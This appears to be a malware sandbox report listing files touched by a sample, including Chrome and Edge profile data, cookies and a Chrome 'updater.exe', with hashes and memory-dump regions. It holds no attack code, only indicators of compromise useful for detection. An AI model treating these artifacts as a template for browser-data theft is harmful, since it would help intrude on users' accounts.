memory/4744-306-0x000002DC01550000-0x000002DC01560000-memory.dmp

memory/4744-308-0x000002DC01550000-0x000002DC01560000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Cache\Cache_Data\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Cache\Cache_Data\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

memory/4744-338-0x000002DC01550000-0x000002DC01560000-memory.dmp

memory/4744-342-0x000002DC01550000-0x000002DC01560000-memory.dmp

memory/4744-353-0x00007FFBFDFF0000-0x00007FFBFEAB1000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Cache\Cache_Data\data_0

MD5 d1f604157b0745a40453afb93a6caa42
SHA1 3d5d77429b03674ebb0ba34d925ba1b09310df5e
SHA256 468456974fd86b33647942820dce7284879acfab9e9e6eca008e1fdcf9006fb5
SHA512 0644ce93724a57dedd8aec208e5a038e323a1b9871d5046d58a87c60479626693e6c8f25b7c7f7b60fd35aac133d2e660ecbd8f8d579ad1fc6703ae117a485a0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Session Storage\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Session Storage\LOG

MD5 ac43bacf5f3c65e5b3f8af913e9ca323
SHA1 eb84e48ed33eb7d4dedfb5cb2f6e659225bab51f
SHA256 2bb88cb5d941a9a159f5014c18a8f0dfd072a5c86cd1ca43bb984447ef915f59
SHA512 0d71e9e4139141ebfcff76ab0aa8db9972a5530cd31151678cd4ede3e56b91196e5d76ee5c9af90d0694efe1a0da9bf087ebdfe9cdc0e36b85259e8849de589a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Default\Local Storage\leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\DawnCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Default\Local Storage\leveldb\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Session Storage\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Local Storage\leveldb\LOG

MD5 2ba90e1323aec1c69f1bc5aa17235aff
SHA1 cc2694aa56aa8cfdbe99f1d055c13b816ba3834b
SHA256 00387e50e9d4273fc2a55fc19411b06e83c114ed70987cf2a6a80f2ea00c3b33
SHA512 35e2fba15bf1081ceca7cea82278b7f33afb6c560f8effde5fc7b7fb10da08018544b405379473b5439a18e6a71b749d8200e5592e01b6878ffd13db4e4b2459

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\GPUCache\index

MD5 578f406f1d4f6bddae61bd561d4e0d52
SHA1 fca47b1f4f34850f2e7c8746c22ffc0fc6836512
SHA256 72c7ffb4a69ba5345985ad7f5f6335529538f0e0a049ca3d2853ff81f1b83fd4
SHA512 fb3d5737937fd0203d3fa5e94d3e93ce44225f090075883da1ed8a586c0ac1bc66e8363986a790036db6f0f0fd3f1e0a12d7c43b49acc90e8b264ade868007e8

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\GPUCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\GPUCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\GPUCache\data_1

MD5 d0d388f3865d0523e451d6ba0be34cc4
SHA1 8571c6a52aacc2747c048e3419e5657b74612995
SHA256 902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b
SHA512 376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\GPUCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\DawnCache\index

MD5 578f406f1d4f6bddae61bd561d4e0d52
SHA1 fca47b1f4f34850f2e7c8746c22ffc0fc6836512
SHA256 72c7ffb4a69ba5345985ad7f5f6335529538f0e0a049ca3d2853ff81f1b83fd4
SHA512 fb3d5737937fd0203d3fa5e94d3e93ce44225f090075883da1ed8a586c0ac1bc66e8363986a790036db6f0f0fd3f1e0a12d7c43b49acc90e8b264ade868007e8

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\DawnCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\DawnCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\DawnCache\data_1

MD5 d0d388f3865d0523e451d6ba0be34cc4
SHA1 8571c6a52aacc2747c048e3419e5657b74612995
SHA256 902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b
SHA512 376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\DawnCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Code Cache\wasm\index-dir\the-real-index

MD5 efddb91e3f6071fa6dfb3fcf6c6b5bd3
SHA1 f6f411df0eb30839ac6afa91333bb0109a7b09d8
SHA256 7cacb7753815168273af4cea6fce13ed425fac55b17f046a12d687425a5109c6
SHA512 943b872de91e73359964bbef2c9d3f53c7941f40b251c47ee0b513f5f7574a14a9c4ec1f739491a09f45033a3acbb5d4254f9183b6415da778b96d14cb16d73d

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Code Cache\wasm\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Code Cache\js\index-dir\the-real-index

MD5 efddb91e3f6071fa6dfb3fcf6c6b5bd3
SHA1 f6f411df0eb30839ac6afa91333bb0109a7b09d8
SHA256 7cacb7753815168273af4cea6fce13ed425fac55b17f046a12d687425a5109c6
SHA512 943b872de91e73359964bbef2c9d3f53c7941f40b251c47ee0b513f5f7574a14a9c4ec1f739491a09f45033a3acbb5d4254f9183b6415da778b96d14cb16d73d

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Code Cache\js\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Cache\Cache_Data\index

MD5 ad4623aae5ca0e1e79d41b498b403d1c
SHA1 0fef57b3cbecdc8c04b39602b064eaa09e261dd4
SHA256 a3eff91b7581af847869ffe4145e92022ea710526df00a225fa619d7652009c1
SHA512 4b9a5990f5be5112fec5125c5b9a524678a2d86eca29a70080ea58144923f22acb46195d13adc7758fbc88bfd813ed5009fbd00f3d5de294df0564b6eea056f8

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Cache\Cache_Data\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Cache\Cache_Data\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Cache\Cache_Data\data_1

MD5 1663ee1068e7e47c308515c2a4ce7ec6
SHA1 9e80b44de6eb13de893e983e10c06e6b66c3d731
SHA256 68d0994088f0357205da5c29e160c296c8828e5bc039f8c11fd032eab07ec413
SHA512 eee1e6cc531cf20251147ca46ce5354be0d419640d7e86f86f1bbcee95f363ffa1226089531ac586769da7bd34c8b7da080fec12fc2e4dc860b3e84f015d47b1

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Crashpad\settings.dat

MD5 61cb1008da3531b2fe24534811529cc9
SHA1 dd26f8c81f259af4c9fd51ed878a1d11a728597f
SHA256 a44e4f454917bcf07eafcb2175f65a0a1fdad28798af26e9ecca25dd91e67076
SHA512 e2bfd435698258dd6c9d63e2d4ee8204e6035e103013dde3532383cb0e2e7f599f4d7b4ccb0a35f4faa3ce642f937a33ea17646820d8f504c212437c57481d81

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\DevToolsActivePort

MD5 d7072277918940d0a52773530baa7316
SHA1 e890c64f26373fa50d8d7f6d6446d42ca8f2b5c7
SHA256 01d08f1e0515737189b17d81b722c8a8555c6f3cf4b8d9f05a318098b47d640d
SHA512 d04ad1aef5059c248794f12963fd7a71399b946e940fd27d5a7da74feb8b579df73d3e982a50ff4ee1315e66602d12ae3af0c8a5b2fcd59309ecc5f07934d884

memory/3328-431-0x00007FF7A5140000-0x00007FF7A63A5000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\CrashpadMetrics-active.pma

MD5 3116632b5cce5c8477c694b708a9d8b6
SHA1 1711664c9680416067b96dedbd344b057b88f4aa
SHA256 b4335dbc7e97d271093ec652708e865214b03d1115628cea8255e5d13be14350
SHA512 d124de1b88e858d01cdd4c6c432f417cfbe67716183581b28be3ccdc60b67e09deb0268453e79931184df17cb491238a1b3fe43f71892515320d972a48d1851d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Crashpad\throttle_store.dat

MD5 9e4e94633b73f4a7680240a0ffd6cd2c
SHA1 e68e02453ce22736169a56fdb59043d33668368f
SHA256 41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304
SHA512 193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Crashpad\settings.dat

MD5 df465b263539e0231508292f9f80d518
SHA1 0ea357d96c609fc948e2b199fe8ce3d87f725a6f
SHA256 053eaba160f31378099b33e26d335151f043e992793d828c36aeceebadb2e290
SHA512 d1d4e5110fe083b7221e79ad2a385bf236b39c047fe39eda5f5b1a7ad403064413c588ba19e0267c4d0a18cf6930444ed76bd2d534550462868a0084790165b7

memory/3328-446-0x00007FFC1E7D0000-0x00007FFC1E9C5000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 bc202c47461acbe8bef80e143eb3a364
SHA1 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256 df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
SHA512 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Local State

MD5 4babfa1eb628818fd007f51e60fcc971
SHA1 a7aca495edd4d357ddb07172cecd1567d2783f4b
SHA256 2498ec4ca7ee175991d405e4b8532f02f065ff938d2be824164608095102f3a3
SHA512 8dabf8511c81ce8ad3b662a3c47e2cf8cf8dd192091f205ecedb19ef31734234e1ab01f21a37937366d5e0c0ab721c016131ed3d355e32fcad8fa98a9c860f11

memory/3864-448-0x00007FF765020000-0x00007FF766285000-memory.dmp

memory/3864-450-0x00007FF765020000-0x00007FF766285000-memory.dmp

memory/3864-453-0x00007FFC1E7D0000-0x00007FFC1E9C5000-memory.dmp

memory/3864-454-0x00007FF765020000-0x00007FF766285000-memory.dmp

\??\pipe\LOCAL\crashpad_2828_BTWOUSNAZTTQOGNV

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/3864-456-0x00007FF765020000-0x00007FF766285000-memory.dmp

memory/3864-457-0x00007FF765020000-0x00007FF766285000-memory.dmp

memory/3864-458-0x00007FF765020000-0x00007FF766285000-memory.dmp

memory/3864-459-0x00007FF765020000-0x00007FF766285000-memory.dmp

memory/3864-461-0x00007FF765020000-0x00007FF766285000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Default\Local Storage\leveldb\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Default\Local Storage\leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Default\Local Storage\leveldb\LOG

MD5 b23645daf6f9e59acbb7258ca37b7ad5
SHA1 ca3bf1d130e7ea551ce9ef5bc8de361577e8b7cd
SHA256 dc6002c7a84b2d30659490f5e673a2ec22309658907a90e05a8b1a8a21878307
SHA512 2d5ee6d7341083c4509e88626376bd34af7c9504f590970db189c58ddc7d4e90622abb9c65a80633ccd16c58b90bbf968df4a595d6056c2fcd16f9ca54338544

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Default\Local Storage\leveldb\LOG.old

MD5 b9e551c29c24eb8e169c16151574127b
SHA1 2e3239056ac973eb1c55dddee10fb44c7366d3ee
SHA256 b7a1f63ce1a188377aa1ef5e95a1d29367dd65cd1a65ee7674047855d3470684
SHA512 298e6e3228abf4c4de665681e7f0966c3cce9c12e9ad0fffa092419dab2c3093ed8eff3b1f6d2e36ac7c1fad10d03f60a54640130e6f1816fccea033602a4176

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Default\Cookies

MD5 49693267e0adbcd119f9f5e02adf3a80
SHA1 3ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256 d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512 b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

memory/3864-493-0x00007FF765020000-0x00007FF766285000-memory.dmp

memory/1824-509-0x00007FFBFF5F0000-0x00007FFC000B1000-memory.dmp

memory/1824-510-0x000002612B580000-0x000002612B590000-memory.dmp

memory/3864-511-0x00007FFC1E7D0000-0x00007FFC1E9C5000-memory.dmp

memory/1824-512-0x000002612B580000-0x000002612B590000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Default\GPUCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

memory/4924-568-0x00000000747F0000-0x0000000074FA0000-memory.dmp

memory/1824-579-0x000002612BA50000-0x000002612BA6C000-memory.dmp

memory/3864-569-0x00007FF765020000-0x00007FF766285000-memory.dmp

memory/1824-580-0x00007FF40A800000-0x00007FF40A810000-memory.dmp

memory/1824-581-0x000002612BA40000-0x000002612BA4A000-memory.dmp

memory/1824-582-0x000002612BC90000-0x000002612BCAC000-memory.dmp

memory/1824-583-0x000002612BC70000-0x000002612BC7A000-memory.dmp

memory/1824-584-0x000002612BCD0000-0x000002612BCEA000-memory.dmp

memory/1824-585-0x000002612BC80000-0x000002612BC88000-memory.dmp

memory/1824-586-0x000002612BCB0000-0x000002612BCB6000-memory.dmp

memory/1824-587-0x000002612BCC0000-0x000002612BCCA000-memory.dmp

memory/1824-588-0x000002612B580000-0x000002612B590000-memory.dmp

memory/4180-622-0x0000000001260000-0x0000000001280000-memory.dmp

memory/3864-623-0x00007FF765020000-0x00007FF766285000-memory.dmp

memory/4624-625-0x00007FF7B8590000-0x00007FF7B85BA000-memory.dmp

memory/2920-626-0x0000000000500000-0x0000000000627000-memory.dmp

memory/2920-634-0x0000000000500000-0x0000000000627000-memory.dmp

memory/2920-635-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-637-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-636-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-638-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-639-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-640-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-641-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-642-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-644-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-645-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-643-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-646-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-647-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-648-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/4180-649-0x00007FF7F9550000-0x00007FF7F9D3F000-memory.dmp

memory/2920-650-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-651-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-652-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-653-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-655-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-654-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-656-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-657-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-658-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-659-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-660-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-661-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-662-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp